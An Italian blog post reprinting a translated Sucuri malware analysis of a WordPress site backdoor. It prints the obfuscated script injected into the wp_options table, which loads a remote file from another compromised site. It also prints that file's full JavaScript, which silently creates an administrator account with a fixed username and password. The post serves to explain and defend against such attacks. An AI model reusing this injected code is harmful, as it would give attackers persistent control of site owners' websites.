Attacco hacker sito compromesso e backdoor

backdoor hacker sito infetto

Attacco hacker sito compromesso e backdoor

L’hacker suona sempre due volte: ed entra dalla porta di servizio

 

Estratto di articolo tradotto [qui l’originale in inglese] autorizzato da Sucuri che detiene il copyright dei testi e dell’immagine. Autore Mohammed Obaid

Una volta che un utente malintenzionato riesce a hackerare e ad accedere a un sito o sistema target, in genere lavora duramente per mantenere il proprio accesso, purché sia ​​possibile per aiutarli a raggiungere i propri obiettivi.

Pensa alla sicurezza del tuo sito web! Contattaci

chiama 339 848 3250

Puoi pensarle all’hacker come un fastidioso personaggio che decide di rimanere senza invito alla tua festa, nascondendosi da qualche parte e approfittando delle tue cose.

Nella maggior parte dei siti compromessi, gli aggressori spesso piantano e posizionano qualcosa chiamato backdoor. Queste backdoor consentono loro di continuare ad accedere ai sistemi compromessi, anche se l’infezione originale viene pulita. La backdoor è posizionata e nascosta in qualche luogo poco appariscente per consentire all’hacker di ignorare il normale processo di autenticazione.

Backdoor: punti di rientro in ambienti compromessi

Mentre esistono backdoor sotto forma di utenti malintenzionati, in cui l’hacker crea un amministratore non autorizzato, altri possono bypassare completamente i meccanismi di accesso inviando una richiesta specifica al sito web. Poiché questo tipo di backdoor offre un punto di accesso diretto al sistema, l’hacker può accedere al pannello di controllo del sito e avere pieno accesso ai propri contenuti ogni volta che lo desidera.

Anche le backdoor possono svolgere attività specifiche, come la creazione di utenti amministratori falsi e dannosi, consentendo anche agli autori di attacchi di mantenere il pieno accesso al sito per periodi di tempo più lunghi.

Reinfezione del sito e sintomi dopo la pulizia

Durante una recente richiesta di riparazione, un cliente si è lamentato del fatto che il suo sito mostrasse attività strane. Sono stati rilevati vari sintomi che indicavano comportamenti malevoli: il proprietario ha visto pubblicare messaggi di spam sul sito ed erano stati creati utenti amministratori sconosciuti. Inoltre pubblicità e popup indesiderati [che non erano mai stati utilizzati sul sito] sono stati mostrati ai visitatori .

A peggiorare le cose, ogni volta che hanno cercato di pulire e rimuovere l’infezione dal sito, i sintomi hanno continuato a ripresentarsi.

Dopo aver esaminato i loro file e database, abbiamo trovato questo codice JavaScript dannoso nascosto nella tabella wp_options:

<script> var sc = document.createElement (String.fromCharCode (115, 99, 114, 105, 112, 116)); sc.src = String.fromCharCode (104, 116, 116, 112, 58, 47, SKIP ………… … SKIP ………………… ..SKIP ………… .46, 99, 111, 109, 47, 119, 112, 45, 105, 110, 99, 108, 117, 100, 101, 115, 47, 106, 115, 47, 121, 101, 115, 98, 97, 98, 121, 46, 106, 115); sc.type = String.fromCharCode (116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116); document.getElementsByTagName (String.fromCharCode (104, 101, 97, 100)) [0] .appendChild (sc); </script>

 

Questo codice JavaScript carica ed esegue uno script da un file ospitato in remoto su un altro sito compromesso: hxxp: //other_victim.com/wp-includes/js/yesbaby.js

Dettagli file remoto

Il contenuto del file remoto yesbaby.js include:

var domain = location.protocol+’//’+document.domain;
var url = domain+’/wp-admin/user-new.php’;
var JQ = jQuery.noConflict();
JQ.ajax({
“url”: url,
“success” : function(x){
console.log(‘Registering, User: echoll, Pass: sikerim, Role: Admin ‘);
JQ.ajax({
“url”: url,
“method” : “POST”,
“data” :
“action”:”createuser”,
“_wpnonce_create-user”: nonce,
“_wp_http_referer” : “/wp-admin/user-new.php”,
“user_login”: “echoll”,
“email” : “echoll981454554@gmail.com”,
“first_name” : “loli”,
“last_name” : “loli”,
“url” : “http://google.com/”,
pass1″ : “sikerim”,
pass1-text” : “sikerim”,
“pass2” : “sikerim”,
“send_user_notification” : 0,
“role”:”administrator”,
“createuser” : “Add+New+User”
},
“success” : function(x){
console.log(“Register done”);
}});}});

 

Questo file JavaScript remoto dannoso viene chiamato ad ogni caricamento del sito. Crea un utente amministratore chiamato “echoll” con il pass “sikerim“, insieme ad altri dettagli come specificato dall’hacker.

Questo essenzialmente fornisce loro pieno accesso all’ambiente compromesso.

Conclusione e mitigazione

Le backdoor possono essere difficili da individuare e rimuovere, soprattutto se i ne hanno nascoste più di una all’interno dell’ambiente di un sito.

Per rilevare backdoor e altre minacce alla sicurezza, Sucuri incoraggia i proprietari di siti web ad implementare una soluzione di monitoraggio dell’integrità dei file per monitorare i file core. Se vengono rilevate modifiche, aggiunte o eliminazioni nell’ambiente, verrai avvisato immediatamente.

La soluzione migliore per mitigare le backdoor è impedire in primo luogo che vengano installate sul tuo sito Web . Usa password complesse, mantieni aggiornato il software e i componenti di terze parti con le patch più recenti e usa un firewall per applicazioni Web per prevenire exploit e proteggere dai malware.

 

Estratto di articolo tradotto [qui l’originale in inglese] autorizzato da Sucuri che detiene il copyright dei testi e dell’immagine. Autore Mohammed Obaid

Hai un problema di sicurezza? Richiedi un preventivo

Servizi professionali a partire da 100,00 € + IVA

Nome e Cognome

Email *

Che problemi di sicurezza hai riscontrato? *

sito compromessoplugin con malwareseo spamphishingblacklistaltro

Contatto telefonico

* Acconsento al trattamento dei dati personali per comunicazioni di natura commerciale dopo aver letto e compreso l' informativa sulla privacy

* campi richiesti

 

Se vuoi condividere la tua esperienza sul caso, commenta sotto.

Articolo apparso per la prima volta in www.fedegrafia.com il 25/09/2019, la notizia può essere condivisa attraverso link con attribuzione all’autore. Non può in ogni caso essere copiata senza autorizzazione.

Federico Benvenuto
info@fedegrafia.com

Mi chiamo Federico Benvenuto, web designer e grafico freelance a Pordenone. Mi occupo di creazione siti internet, consulenza web marketing e SEO, di grafica e stampa, corsi su contenuti internet e servizi fotografici. Ho una specializzazione Tecnico web designer – editing multimediale e in Comunicazione digitale per l’e-government ottenute presso Enaip FVG. Ho conseguito il diploma di Fotografia Professionale Avanzata presso CSG G. Micesio di Udine. Sono laureato in Economia e Commercio ed ho una specializzazione di secondo livello in Marketing per le piccole medie imprese. Lavoro principalmente per pmi, enti pubblici e organizzatori eventi della provincia di Pordenone, Udine e del Veneto orientale (province di Venezia e Treviso).

No Comments

Scrivi un Commento

Questo sito usa Akismet per ridurre lo spam. Scopri come i tuoi dati vengono elaborati.